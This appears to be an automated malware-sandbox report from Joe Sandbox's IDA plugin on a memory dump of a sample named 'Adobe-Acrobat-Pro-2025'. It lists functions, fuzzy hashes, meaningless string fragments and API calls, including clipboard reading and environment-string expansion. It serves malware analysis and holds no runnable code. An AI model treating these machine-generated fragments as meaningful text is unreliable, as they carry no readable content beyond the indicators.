Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: !$"$#$#$&$)$+$+$-$/$0$4$@$@$A$C$D$D$E$G$I$I$K$L$M$M$O$P$P$Q$Q$Q67d$S$S$U$V$W$Y$Y$[$[$]$]$_$_$`$a$c$d$e$g$h$h$h$i$k$m$o$p$q$s$u$w$y${$}
API String ID: 0-2942958629
Opcode ID: 6cb73d7eca8389f5b87afa680f9710cd37e88b3d3e4b262f499fcddd6b8f3b6c
Instruction ID: 17d84ea6a3c814ebfb45c73b6155800ba08a93a756a12f6865d3363cefea10d0
Opcode Fuzzy Hash: 6cb73d7eca8389f5b87afa680f9710cd37e88b3d3e4b262f499fcddd6b8f3b6c
Instruction Fuzzy Hash: B3126321D087D9C9DB22C67C88483CDBFA11B67324F0843D9D5E96B3D2C7B90A46CB66

Function 00424D86 Relevance: 30.8, Strings: 24, Instructions: 843COMMON

Download Yara Rule

Strings

'%, xrefs: 00425EA5
:F=D, xrefs: 00425FE0
%W&Q, xrefs: 00425C45
F2@0, xrefs: 00425FCB
Mz7x, xrefs: 0042602D
Hf6, xrefs: 00425EFE
YX, xrefs: 00425ADE
FN+L, xrefs: 00425FD2
&f,d, xrefs: 00426018
R*V(, xrefs: 00425FA1
<B7@, xrefs: 00425FE7
RcM}, xrefs: 004258A2
j"h, xrefs: 00426011
k[gU, xrefs: 00425866
A0, xrefs: 00425ACA
Hf6, xrefs: 0042553E
k.V,, xrefs: 00425F9A
Hv8t, xrefs: 00426034
(b<`, xrefs: 0042601F
gWaQ, xrefs: 00425870
!R P, xrefs: 00426003
;~%|, xrefs: 00426026
DrBp, xrefs: 0042603B
\S, xrefs: 00425AD4

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: j"h$!R P$%W&Q$&f,d$'%$(b<`$:F=D$;~%|$<B7@$A0$DrBp$F2@0$FN+L$Hf6$Hf6$Hv8t$Mz7x$R*V($RcM}$YX$\S$gWaQ$k.V,$k[gU
API String ID: 0-2750181780
Opcode ID: c37733f581419f43bc41f5e165d3e34f4c51ba8f5e19b71dd55b11706778890e
Instruction ID: bd132de7efb1dbd48a2f3cfae0c1ac3ec1e3343be1e174156d885846817b5f5a
Opcode Fuzzy Hash: c37733f581419f43bc41f5e165d3e34f4c51ba8f5e19b71dd55b11706778890e
Instruction Fuzzy Hash: 33A250B09047688FDB24CF55C88538ABBB1FB45300F5086ECC8996F75AD7749A86CF85

Function 00438CE4 Relevance: 26.6, Strings: 21, Instructions: 316COMMON

Download Yara Rule

Strings

l, xrefs: 00438E32
m, xrefs: 00438E16
0, xrefs: 004390E2
b, xrefs: 00438E24
w, xrefs: 00439003
3, xrefs: 00438D36
d, xrefs: 00438FBD
), xrefs: 00438DA6
s, xrefs: 00438FE7
`, xrefs: 00439011
i, xrefs: 00438E40
f, xrefs: 00438E5C
~, xrefs: 00438FF5
>, xrefs: 00438F9C
u, xrefs: 00438FD9
<, xrefs: 00438F93
e, xrefs: 00438E08
l, xrefs: 00438FCB
J, xrefs: 00438E78
j, xrefs: 00438E4E
I, xrefs: 00438E6A

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: )$0$3$<$>$I$J$`$b$d$e$f$i$j$l$l$m$s$u$w$~
API String ID: 0-3907799637
Opcode ID: b85a686da422ba9acf62cfea6ca37a29e0d047625e47918383726e0865c12a47
Instruction ID: be96ce1d82b98622aa9f26f2b849ed049f8c66a7b94aee419707ea96b9d904b3
Opcode Fuzzy Hash: b85a686da422ba9acf62cfea6ca37a29e0d047625e47918383726e0865c12a47
Instruction Fuzzy Hash: 99E1E631D086E98ADB36C63C8C047DDBEA15B66324F0883E9C4A96B3D2D7B50F85CB51

Function 0040E95A Relevance: 25.2, APIs: 2, Strings: 12, Instructions: 658COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(?), ref: 0040F067
RtlExpandEnvironmentStrings.NTDLL ref: 0040F172

Strings

Y, xrefs: 0040EEAD
l, xrefs: 0040EB52
Q, xrefs: 0040EE08
=, xrefs: 0040E96D
A, xrefs: 0040E9C9
G, xrefs: 0040E9E1
c, xrefs: 0040EEA5
\, xrefs: 0040EBCF
), xrefs: 0040F096
yCmX, xrefs: 0040EA7B
E, xrefs: 0040E9D1
F, xrefs: 0040E9D9

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: )$=$A$E$F$G$Q$Y$\$c$l$yCmX
API String ID: 237503144-210847108
Opcode ID: ce5ca0287708e13f9a9db378ea8b81a43cfbce8eee206c5c246a231fd5e397e9
Instruction ID: cf2949de9d237bba4a7b64751ff4236ab982c22a284255d754ab47ce16b16e7c
Opcode Fuzzy Hash: ce5ca0287708e13f9a9db378ea8b81a43cfbce8eee206c5c246a231fd5e397e9
Instruction Fuzzy Hash: D442793120D7818BD3249B3984957AFBBE2ABD6314F188A7EE4D9933D2D6388545CB07

Function 00427AF0 Relevance: 19.1, Strings: 15, Instructions: 367COMMON

Download Yara Rule

Strings

I1L3, xrefs: 004281F5
NY, xrefs: 0042816A
V%c', xrefs: 0042822C
8U%W, xrefs: 00428258
YOBU, xrefs: 004285D9
[)U+, xrefs: 0042820B
W!c#, xrefs: 00428221
W9, xrefs: 00428162
^WYT, xrefs: 004285EF
4Y,[, xrefs: 00428237
@A, xrefs: 00428279
[, xrefs: 00428172
q5Z7, xrefs: 00428200
E9{;, xrefs: 004281DF
j-Z/, xrefs: 00428216

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: 4Y,[$8U%W$@A$E9{;$I1L3$NY$V%c'$W!c#$W9$YOBU$[)U+$[$^WYT$j-Z/$q5Z7
API String ID: 0-2331589468
Opcode ID: 2a001600b7f6094794910a4fe89b0e37ad3caefbacb8bc2a5d93bcb050c66e73
Instruction ID: 31368d9c39acf4fe268cc9844da4713ea80796eb406614c55ec3451587c8efa1
Opcode Fuzzy Hash: 2a001600b7f6094794910a4fe89b0e37ad3caefbacb8bc2a5d93bcb050c66e73
Instruction Fuzzy Hash: 10D1F1B5609390CBD3348F24E84176BB7E1FBC6304F45896DE4C99B291DB398806CB9B

Function 00410BCA Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 521COMMON

Download Yara Rule

Strings

Y, xrefs: 00410F4E
x, xrefs: 00410C29
$, xrefs: 00410FB7
&, xrefs: 00410FBC
, xrefs: 00410BDD
E, xrefs: 00411110
E, xrefs: 004111B4

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: $$$&$E$E$Y$x
API String ID: 0-2718948019
Opcode ID: d9353cee20d4d26e049b4d511ba705c3da62ed0d07097a7b0e3858e81bb9fa4f
Instruction ID: 729318b856936812e66b40b33b0fbbac065c35f9e939e7fa159f4d05780a2c85
Opcode Fuzzy Hash: d9353cee20d4d26e049b4d511ba705c3da62ed0d07097a7b0e3858e81bb9fa4f
Instruction Fuzzy Hash: AB22A371A0D7808BC324DF39C4853AEBBE1ABD5324F148A2EE5D9973D1D6788981CB47

Function 004152B4 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 275COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004155AF

Strings

L(), xrefs: 0041560E
fUsW, xrefs: 004152F9
9Y'[, xrefs: 004152E1
;c4, xrefs: 00415315
dQaS, xrefs: 004152F1
2A=C, xrefs: 004152D1
#E4G, xrefs: 004152D9

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: #E4G$2A=C$9Y'[$;c4$L()$dQaS$fUsW
API String ID: 237503144-1524193914
Opcode ID: eb6d40256d8e2855654010982134a6101159effbd68930f62552ce232d89e0ae
Instruction ID: 9b31dafbd274997dde6e64e4f603f5e8e30ddb8c9c752d7b77449c104ece415f
Opcode Fuzzy Hash: eb6d40256d8e2855654010982134a6101159effbd68930f62552ce232d89e0ae
Instruction Fuzzy Hash: 4F91F176918762CBC324CF19C4502ABB7F2FFD8750F098A1EE8C997254E7789941CB86

Function 0042A050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 112COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042A154

Strings

Jbc , xrefs: 0042A193
:OHI, xrefs: 0042A0D2
Jbc , xrefs: 0042A125, 0042A0E0
Q#A=, xrefs: 0042A0AA
M?K9, xrefs: 0042A0B2
^/I), xrefs: 0042A092
C;C5, xrefs: 0042A0BA

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: :OHI$C;C5$Jbc $Jbc $M?K9$Q#A=$^/I)
API String ID: 237503144-174320839
Opcode ID: 0093dc7d6311d2a71085e70dcb96f94915e312a19a39e09e9b984d4b63a2729e
Instruction ID: ce2e732159f5ff81254f727f616b9d86a58eb91e7d39d6fd3def7cd230d463f1
Opcode Fuzzy Hash: 0093dc7d6311d2a71085e70dcb96f94915e312a19a39e09e9b984d4b63a2729e
Instruction Fuzzy Hash: 904125B2A083108BD3148F21DC4165FFBE2EBD6314F09CA6DE9995B294D774C806CB87

Function 00424AC0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 266COMMON

Download Yara Rule

Strings

8R<P, xrefs: 00424BE4
1Z5X, xrefs: 00424BD0
0V3T, xrefs: 00424BDA
-F)D, xrefs: 00424BB2
mj, xrefs: 00424BF8

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: -F)D$0V3T$1Z5X$8R<P$mj
API String ID: 0-3933831060
Opcode ID: ebf3c77ef60dc623708de92945b6958f252a48c84e9eebc923f4278cbcc1a32a
Instruction ID: 64e1c1de232503296a7138b98579c766a7eeeaf394449e9874673e004b66d956
Opcode Fuzzy Hash: ebf3c77ef60dc623708de92945b6958f252a48c84e9eebc923f4278cbcc1a32a
Instruction Fuzzy Hash: B1912FB0E183589FDB00DF68D84279EBBF5FB85310F0086BDE458AB281D77489468F96

Function 004354B0 Relevance: 9.1, APIs: 6, Instructions: 131clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004354D4
GetClipboardData.USER32 ref: 004354F7
GlobalLock.KERNEL32 ref: 00435514
GlobalUnlock.KERNEL32 ref: 00435637
CloseClipboard.USER32 ref: 0043563F

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: df919bb6fa34b1a7f733222de7a385abd117f3b4e2beb5ce3823050bb2c8b4b9
Instruction ID: 821e2241ca25528fd77676464ac741477ecbf26e75850cf3835fbabf4c4fa141
Opcode Fuzzy Hash: df919bb6fa34b1a7f733222de7a385abd117f3b4e2beb5ce3823050bb2c8b4b9
Instruction Fuzzy Hash: 1C4117B1808B919FD700AB78D44936EBFF0AB16304F09863DD49987381D37D9558C7A7

Function 00401040 Relevance: 8.1, Strings: 6, Instructions: 595COMMON

Download Yara Rule

Strings

null, xrefs: 00401218
false, xrefs: 00401192
`~@, xrefs: 004011AE, 004011EB, 00401234, 00401259, 0040127B, 00401370, 0040139D, 004013BF, 0040142E, 004014C7
p~@, xrefs: 0040145C, 0040147B, 00401500, 004016F3, 00401702, 0040170B
true, xrefs: 0040117A
adwr, xrefs: 00401043

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: `~@$adwr$false$null$p~@$true
API String ID: 0-2552110956
Opcode ID: d5f51eed25b55491613f01779d338681c08ea32648c579ebe30617c9bc9b20fe
Instruction ID: 713968194265142499101f26fdc5f8efa641a7b3d28a710fcbfeecaba18e106f
Opcode Fuzzy Hash: d5f51eed25b55491613f01779d338681c08ea32648c579ebe30617c9bc9b20fe
Instruction Fuzzy Hash: 6A12D0B49043059BE7105F21DC45B277AA4AF41388F19443EE8C6AB3F3EB39D915CB9A

Function 0041F640 Relevance: 8.0, Strings: 6, Instructions: 546COMMON

Download Yara Rule

Strings

C\], xrefs: 0041F774
v^hb, xrefs: 0041F784
q[Oe, xrefs: 0041F881
Mg`a, xrefs: 0041F889
N, xrefs: 0041FB86
ga, xrefs: 0041F720

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: Mg`a$N$q[Oe$v^hb$C\]$ga
API String ID: 0-2929056367
Opcode ID: 947fb17f9befe4e36fc17112bf5d4e4bea325942f50d5395f54c31f537f840b9
Instruction ID: efdebc69bf4b87fc5924ff40825564287609b4244f08c6c6f8aa21f0dd64008e
Opcode Fuzzy Hash: 947fb17f9befe4e36fc17112bf5d4e4bea325942f50d5395f54c31f537f840b9
Instruction Fuzzy Hash: 45F149B29183108BC324DF24C85276BB7F2FFD5350F198A2DD8958B394E7789845CB86

Function 0040AE20 Relevance: 8.0, Strings: 6, Instructions: 502COMMON

Download Yara Rule

Strings

41, xrefs: 0040B013
;0, xrefs: 0040B01D
J|Or, xrefs: 0040AF11
w1w3, xrefs: 0040B2CF
CpQv, xrefs: 0040AF18
`567, xrefs: 0040B2D6

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: 41$;0$CpQv$J|Or$`567$w1w3
API String ID: 0-2018014043
Opcode ID: 0a55afc984b8d10c3e6074072a2f60be0c31abb2dbf31987d8a25660e79f8202
Instruction ID: ce14dec60d695166aa0e5a928fe481ae68a844664f4a38f38371d7e68957df07
Opcode Fuzzy Hash: 0a55afc984b8d10c3e6074072a2f60be0c31abb2dbf31987d8a25660e79f8202
Instruction Fuzzy Hash: E612A9B5600B00CFD724CF75DC91B97BBE2FB4A315F058A2DD1AA8B6A1DB78A405CB44

Function 00418690 Relevance: 7.9, APIs: 2, Strings: 2, Instructions: 941COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00418B67
FreeLibrary.KERNEL32(?), ref: 00418BA9

Part of subcall function 0043F280: LdrInitializeThunk.NTDLL(0044258D,?,00000018,?,?,00000018,?,?,?), ref: 0043F2AE

Strings

x~, xrefs: 00418959
6T1J, xrefs: 00418970

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: 6T1J$x~
API String ID: 764372645-1829175989
Opcode ID: e7266433b599e6b229c845592bbd448edef7cb3567eed91120df4ede1fe1fed9
Instruction ID: eee4de945ba4c42a4f23e6f761198b592bf14841352fd36b6a8d8e8fe78f6777
Opcode Fuzzy Hash: e7266433b599e6b229c845592bbd448edef7cb3567eed91120df4ede1fe1fed9
Instruction Fuzzy Hash: 7A622AB4648300AFE724CB25DC907BB77E2EBC5314F148A2EF495473A1D7389C968B5A

Function 0041572C Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 390COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00415A15

Strings

x{, xrefs: 00415904
C, xrefs: 0041590C

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: C$x{
API String ID: 237503144-3206113506
Opcode ID: 23559cc0415b2dfeec11e1dd83de892b2636f79578e651ff2ce4c434baee3f83
Instruction ID: f799768cbc5089aaa768a27089ed39d9bb050548448e56c371322a24f0c0853f
Opcode Fuzzy Hash: 23559cc0415b2dfeec11e1dd83de892b2636f79578e651ff2ce4c434baee3f83
Instruction Fuzzy Hash: 7CC14872908711CBC320CF24C8916ABB7E1FFD9714F194A2DE8C99B351E3789941C786

Function 00424780 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 252COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0042485C
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00424911

Strings

PV, xrefs: 004247D2
*LB, xrefs: 004247AA

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: *LB$PV
API String ID: 237503144-2356999807
Opcode ID: 006cb3f70ef5e93c7f7dc6e77ac49f450659ebac3f0485390ca0f99b11e7f1be
Instruction ID: 97d9dd9661db6a0527a497a28e58cb2341bad7f658b6f4414ae5a9e0fafe68dd
Opcode Fuzzy Hash: 006cb3f70ef5e93c7f7dc6e77ac49f450659ebac3f0485390ca0f99b11e7f1be
Instruction Fuzzy Hash: 828124B165C3518FD3048F29D84165BBBE2FBC2314F198A7CE4959B290CBB9C8078B86

Function 0043DF80 Relevance: 6.8, Strings: 5, Instructions: 575COMMON

Download Yara Rule

Strings

f, xrefs: 0043E1AD
S"(w, xrefs: 0043E040
9F74, xrefs: 0043DFEA
9F74, xrefs: 0043E015
S"(w, xrefs: 0043E291

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: InitializeThunk
String ID: 9F74$9F74$S"(w$S"(w$f
API String ID: 2994545307-1156308901
Opcode ID: 2eb25843924df40aa33a3a16d840917b5a0e4b4930ee3f022d5eb9876fb53227
Instruction ID: a200eff28fdae68eb74d2b46cecf92349644999239eabed82f9c75ade4a190ee
Opcode Fuzzy Hash: 2eb25843924df40aa33a3a16d840917b5a0e4b4930ee3f022d5eb9876fb53227
Instruction Fuzzy Hash: 1512F27060A3509FD714CF16C88062BBBE1ABD9314F198A2EE9A5573D2C379DC02CB96

Function 0041600C Relevance: 5.7, Strings: 4, Instructions: 733COMMON

Download Yara Rule

Strings

VW, xrefs: 00416287
P1_3, xrefs: 00416356
D, xrefs: 0041642B
0kA, xrefs: 0041608C, 004168E4, 004168EA

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: 0kA$D$P1_3$VW
API String ID: 0-1820056282
Opcode ID: 0ea9aa01961d5fa94eafd35fbf84cfc9eee7ebb73e7ab66672f52ad4166e33ae
Instruction ID: 6d4b34165a5b601a8497c597545a344ff95db7c6965ea4060db120722110c2ea
Opcode Fuzzy Hash: 0ea9aa01961d5fa94eafd35fbf84cfc9eee7ebb73e7ab66672f52ad4166e33ae
Instruction Fuzzy Hash: 9722E2B4608340DFD324CF24C850BABB7E1FF8A314F16896DE4DA8B291D7389945CB5A

Function 004291E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042926C
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 004292EE

Strings

74, xrefs: 00429442

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 74
API String ID: 237503144-4033496702
Opcode ID: 7b0e47d81c4c915aaa8c1442d817ba97a6b4825c95e818a75c46ac687a6598ea
Instruction ID: b1b325b3533c0e93c99b7dc9be0f35aa76db8aa12ab82856f46760846f758fb4
Opcode Fuzzy Hash: 7b0e47d81c4c915aaa8c1442d817ba97a6b4825c95e818a75c46ac687a6598ea
Instruction Fuzzy Hash: 7981DF7161C3658FD714CF28A810A5FBBE6EBC6704F028D3DE5958B2C2D7B48906CB96

Function 0040A9A0 Relevance: 5.4, Strings: 4, Instructions: 389COMMON

Download Yara Rule

Strings

4;cz, xrefs: 0040ACBF
=-0', xrefs: 0040ACEF, 0040ADE1, 0040ADE2
M@AF, xrefs: 0040AB00
"#, xrefs: 0040AB39

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: "#$4;cz$=-0'$M@AF
API String ID: 0-213686063
Opcode ID: 35fc89a5774836ae650983e3737947f4ae45c9b586fd6aa896f5ea50d16650d8
Instruction ID: 251136ec3126da4289fe67ebdfae9b3319df41ac9ed9652bcd16dacab103913d
Opcode Fuzzy Hash: 35fc89a5774836ae650983e3737947f4ae45c9b586fd6aa896f5ea50d16650d8
Instruction Fuzzy Hash: B9B1177160C3518BD324CF2884506ABBBE2EFC2714F58497DE8D56B382C6398D5ADB87

Function 00414830 Relevance: 4.3, Strings: 3, Instructions: 559COMMON

Download Yara Rule

Strings

(rnz, xrefs: 00414EFF
`jla, xrefs: 00414EF4
adwr, xrefs: 00414F76, 00414F7D

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: (rnz$`jla$adwr
API String ID: 0-3673195243
Opcode ID: 57409efb83553377e0c6a83ad85fafcdb21b202d6be1f84801e9706d4d705533
Instruction ID: 488b7b5205939d927c054a85733c277e2064e991f4dd507021b879b75c7a6f66
Opcode Fuzzy Hash: 57409efb83553377e0c6a83ad85fafcdb21b202d6be1f84801e9706d4d705533
Instruction Fuzzy Hash: ED0201B5909340CBD7209F28DC41BABB7A1FFD6314F05492EE489973A1E7389841CB9B

Function 0041B3F0 Relevance: 4.3, Strings: 3, Instructions: 516COMMON

Download Yara Rule

Strings

x~, xrefs: 0041B7C1
6, xrefs: 0041B505
c`, xrefs: 0041B7D1

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: 6$c`$x~
API String ID: 0-1098495160
Opcode ID: 0d073e5ade24d9f403471f1116d4c0e9eee8ab3d9073e625a4dc45f95ed3b9c6
Instruction ID: dc11518e66ea70ba9715900fd1da23a389812a2d853fecb833665a8528e1bd20
Opcode Fuzzy Hash: 0d073e5ade24d9f403471f1116d4c0e9eee8ab3d9073e625a4dc45f95ed3b9c6
Instruction Fuzzy Hash: 0FD12576A143108BC724CF69CC823ABB3E2FFD5314F19862DE8D58B391E77899448796

Function 004210B0 Relevance: 4.2, Strings: 3, Instructions: 420COMMON

Download Yara Rule

Strings

+T&J, xrefs: 004210F0
OL, xrefs: 004210DC
htu, xrefs: 0042133D

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: +T&J$OL$htu
API String ID: 0-3959946811
Opcode ID: ada7d869b65048bb6e774374819493263ba109782e08de9ae4c12d902171b13f
Instruction ID: 12e0a834aa1fa1f6191ce5e036a4865aa81d42da53888d61ca6e437ab60d1f68
Opcode Fuzzy Hash: ada7d869b65048bb6e774374819493263ba109782e08de9ae4c12d902171b13f
Instruction Fuzzy Hash: C9A14971B042208BD714DF25E89263B73E1EFA5354F49446EE8C6973A1E338ED45C35A

Function 00416C9D Relevance: 4.1, Strings: 3, Instructions: 361COMMON

Download Yara Rule

Strings

o, xrefs: 00416CAD
<9:{, xrefs: 00416FF4
pO>s, xrefs: 00416DB8

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: <9:{$o$pO>s
API String ID: 0-4178935313
Opcode ID: 49e3fa5320f3fe4dcc20432e4efa0a94edd338bbc332e59c3ad88f302bed6419
Instruction ID: cafff82d2093df2218b317a4803d6bd05b9d325091f91fc82d83e01682415c20
Opcode Fuzzy Hash: 49e3fa5320f3fe4dcc20432e4efa0a94edd338bbc332e59c3ad88f302bed6419
Instruction Fuzzy Hash: 71C139746083408BD724CF28D8507BBB7E2FBDA314F198A6DE4C947292D738D896C75A

Function 00411356 Relevance: 4.0, Strings: 3, Instructions: 252COMMON

Download Yara Rule

Strings

m, xrefs: 00411369
Y, xrefs: 004113D1
P, xrefs: 00411469

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: P$Y$m
API String ID: 0-1894246851
Opcode ID: cbf03324886bf0498dc04d81c9796f8ee12a8cd829abadedbd731bccbe982d55
Instruction ID: 91e01e64806c832ea758afd82a3dfb4e6b9b265783d0e6f054c18b98c7947e5c
Opcode Fuzzy Hash: cbf03324886bf0498dc04d81c9796f8ee12a8cd829abadedbd731bccbe982d55
Instruction Fuzzy Hash: B091B27160D7408FC328AF3984912AEBBE5AF85324F054A3FE5D9D73D1DA3889418B47

Function 0040E6E0 Relevance: 4.0, Strings: 3, Instructions: 206COMMON

Download Yara Rule

Strings

N, xrefs: 0040E89E
k, xrefs: 0040E702
M, xrefs: 0040E7E8

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: M$N$k
API String ID: 0-412985904
Opcode ID: 5404582a4d5f610ef1f28890fb702f403e0433c6181d87418a758ac6f5630597
Instruction ID: 03c63a028ab2f705c8ac251d444b353d8d791e321ac74d671ce2d5b55f2fb98b
Opcode Fuzzy Hash: 5404582a4d5f610ef1f28890fb702f403e0433c6181d87418a758ac6f5630597
Instruction Fuzzy Hash: 6C61067361C7908BD7189A39884139BBAD1ABD6320F194B3FD9E5E33C1D5788902974A

Function 00404B10 Relevance: 3.3, Strings: 2, Instructions: 797COMMON

Download Yara Rule

Strings

